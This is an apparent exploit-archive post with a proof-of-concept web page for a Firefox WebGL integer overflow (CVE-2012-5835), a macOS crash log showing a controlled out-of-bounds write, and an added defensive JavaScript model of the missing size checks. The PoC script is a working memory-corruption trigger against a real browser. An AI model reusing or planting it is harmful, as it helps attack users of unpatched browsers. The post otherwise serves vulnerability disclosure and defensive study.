Mozilla Firefox WebGL Proof Of Concept
Posted on 18 February 2017
# Exploit Title: Integer overflow in the WebGL subsystem of Mozilla Firefox
# Date: 15-02-2017
# Software Link: https://www.mozilla.org/en-US/firefox/new/
# Exploit Author: Bikash Dash (originally found by the Google Project Zero team)
# Tested On: MAC OS x86
# Website: http://vulnerableghost.com/
# CVE: CVE-2012-5835
# Category: webapps (Mozilla)

<html>
<head>
<script>
// Obtain a WebGL context and a buffer object to work with.
var gl = document.createElement('canvas').getContext('experimental-webgl');
var buf = gl.createBuffer();
gl.bindBuffer(gl.ARRAY_BUFFER, buf);

// The offset that will later show up as the faulting address in the crash log.
var magic = 0x12345678;

// First allocate magic+1 bytes, then re-specify the buffer with a size of 2^32,
// which does not fit in the 32-bit size type the implementation uses.
gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic + 1), gl.STATIC_DRAW);
gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW);

// Write one byte at offset magic; the bounds check passes against the
// mis-sized buffer and memmove faults at address 0x12345678.
gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1));
</script>
</head>
</html>

Crash Information:
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb %al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678:
Crash accessing invalid address.
Consider running it again with libgmalloc(3) to see if the log changes.
Test case was b291.html

Process: firefox [3732]
Path: /Applications/Firefox.app/Contents/MacOS/firefox
Identifier: firefox
Version: ??? (???)
Code Type: X86-64 (Native)
Parent Process: exc_handler [3731]
Date/Time: 2017-02-15 10:44:52.818 +0300
OS Version: Mac OS X 10.8.1 (12B19)
Report Version: 9
Crashed Thread: 0 Dispatch queue: com.apple.main-thread
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_c.dylib 0x00007fff92c82a41 memmove$VARIANT$sse42 + 57
1 GLEngine 0x000000010cfa9982 glBufferSubData_Exec + 856
2 XUL 0x00000001020df955 0x10111a000 + 16537941
3 XUL 0x000000010257424b 0x10111a000 + 21340747
4 XUL 0x0000000102564622 0x10111a000 + 21276194
5 XUL 0x0000000102573ae2 0x10111a000 + 21338850
6 XUL 0x0000000102573ce9 0x10111a000 + 21339369
7 XUL 0x0000000102573fe5 0x10111a000 + 21340133
8 XUL 0x00000001024f2d2d 0x10111a000 + 20811053
9 XUL 0x00000001024f2e5b JS_EvaluateUCScriptForPrincipalsVersionOrigin + 107
10 XUL 0x000000010182121d 0x10111a000 + 7369245
11 XUL 0x00000001015ef000 0x10111a000 + 5066752
12 XUL 0x00000001015f0538 0x10111a000 + 5072184
13 XUL 0x00000001015f117a 0x10111a000 + 5075322
14 XUL 0x00000001015ee4bd 0x10111a000 + 5063869
15 XUL 0x00000001019a41b6 0x10111a000 + 8954294
16 XUL 0x00000001019a6285 0x10111a000 + 8962693
17 XUL 0x00000001019aa94d 0x10111a000 + 8980813
18 XUL 0x00000001021324f3 0x10111a000 + 16876787
19 XUL 0x00000001020f1c0e 0x10111a000 + 16612366
20 XUL 0x0000000101f5b009 0x10111a000 + 14946313
21 XUL 0x0000000101f1f4bf 0x10111a000 + 14701759
22 com.apple.CoreFoundation 0x00007fff917fd841 __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
23 com.apple.CoreFoundation 0x00007fff917fd165 __CFRunLoopDoSources0 + 245
24 com.apple.CoreFoundation 0x00007fff918204e5 __CFRunLoopRun + 789
25 com.apple.CoreFoundation 0x00007fff9181fdd2 CFRunLoopRunSpecific + 290
26 com.apple.HIToolbox 0x00007fff8f6f3774 RunCurrentEventLoopInMode + 209
27 com.apple.HIToolbox 0x00007fff8f6f3512 ReceiveNextEventCommon + 356
28 com.apple.HIToolbox 0x00007fff8f6f33a3 BlockUntilNextEventMatchingListInMode + 62
29 com.apple.AppKit 0x00007fff96591fa3 _DPSNextEvent + 685
30 com.apple.AppKit 0x00007fff96591862 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
31 XUL 0x0000000101f1e942 0x10111a000 + 14698818
32 com.apple.AppKit 0x00007fff96588c03 -[NSApplication run] + 517
33 XUL 0x0000000101f1ed2d 0x10111a000 + 14699821
34 XUL 0x0000000101d867b4 0x10111a000 + 13027252
35 XUL 0x0000000101121193 0x10111a000 + 29075
36 XUL 0x0000000101125fbb 0x10111a000 + 49083
37 XUL 0x00000001011264c3 XRE_main + 307
38 org.mozilla.firefox 0x0000000100001e15 0x100000000 + 7701
39 org.mozilla.firefox 0x0000000100001584 start + 52

Thread 0 crashed with X86 Thread State (64-bit):
rax: 0xffffffff0b4f3400 rbx: 0x000000011506ac00 rcx: 0x0000000000000000 rdx: 0x0000000000000001
rdi: 0x0000000012345678 rsi: 0x0000000106e521d1 rbp: 0x00007fff5fbfb9d0 rsp: 0x00007fff5fbfb9d0
r8: 0x0000000000000000 r9: 0x00007fff5fbfb970 r10: 0x000000010a50c5b0 r11: 0x0000000012345678
r12: 0x0000000012345678 r13: 0x0000000113607b68 r14: 0x0000000113607b40 r15: 0x0000000000000001
rip: 0x00007fff92c82a41 rfl: 0x0000000000010206 cr2: 0x0000000012345678
Logical CPU: 2
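As an added defender's example (not part of the original PoC or of Firefox's code), the JavaScript below models the size validation a WebGL binding should apply before passing the PoC's arguments to the driver, and replays the three PoC calls against it; the 32-bit GLsizeiptr limit and the buffer record are assumptions.

```javascript
// Added example, not the original PoC. Models the checks a WebGL binding
// should perform on bufferData/bufferSubData arguments. The buffer record
// is a hypothetical simplification of browser-side buffer state.

const MAGIC = 0x12345678;            // offset used by the PoC
const MAX_GLSIZEIPTR = 2 ** 31 - 1;  // assumed 32-bit signed GLsizeiptr

// What a bare 32-bit cast does to the PoC's size argument: 2**32 becomes 0,
// so the driver is asked for an empty buffer while the binding still
// believes the later bufferSubData lies inside the allocation.
function truncateToUint32(n) {
  return n >>> 0;
}

// Hardened bufferData: reject any size the GL type cannot represent
// instead of silently truncating it.
function checkedBufferData(buffer, size) {
  if (!Number.isSafeInteger(size) || size < 0 || size > MAX_GLSIZEIPTR) {
    return { ok: false, error: 'INVALID_VALUE: size not representable' };
  }
  buffer.byteLength = size;
  return { ok: true };
}

// Hardened bufferSubData: validate offset and length against the tracked
// byte length without ever forming offset + length (a C++ port of this
// check must avoid that sum because it can wrap).
function checkedBufferSubData(buffer, offset, dataLength) {
  if (!Number.isSafeInteger(offset) || offset < 0 ||
      !Number.isSafeInteger(dataLength) || dataLength < 0) {
    return { ok: false, error: 'INVALID_VALUE: negative or non-integer' };
  }
  if (offset > buffer.byteLength || dataLength > buffer.byteLength - offset) {
    return { ok: false, error: 'INVALID_VALUE: range exceeds buffer' };
  }
  return { ok: true };
}

// Replays the PoC's three calls against the checked implementation and
// returns the outcome of each step: the oversized bufferData is rejected,
// so the buffer keeps its MAGIC + 1 bytes and the 1-byte write stays in bounds.
function replayPoc() {
  const buffer = { byteLength: 0 };
  return [
    checkedBufferData(buffer, MAGIC + 1),    // step 1: allocate 0x12345679 bytes
    checkedBufferData(buffer, 2 ** 32),      // step 2: the PoC's oversized size
    checkedBufferSubData(buffer, MAGIC, 1),  // step 3: write 1 byte at MAGIC
  ];
}
```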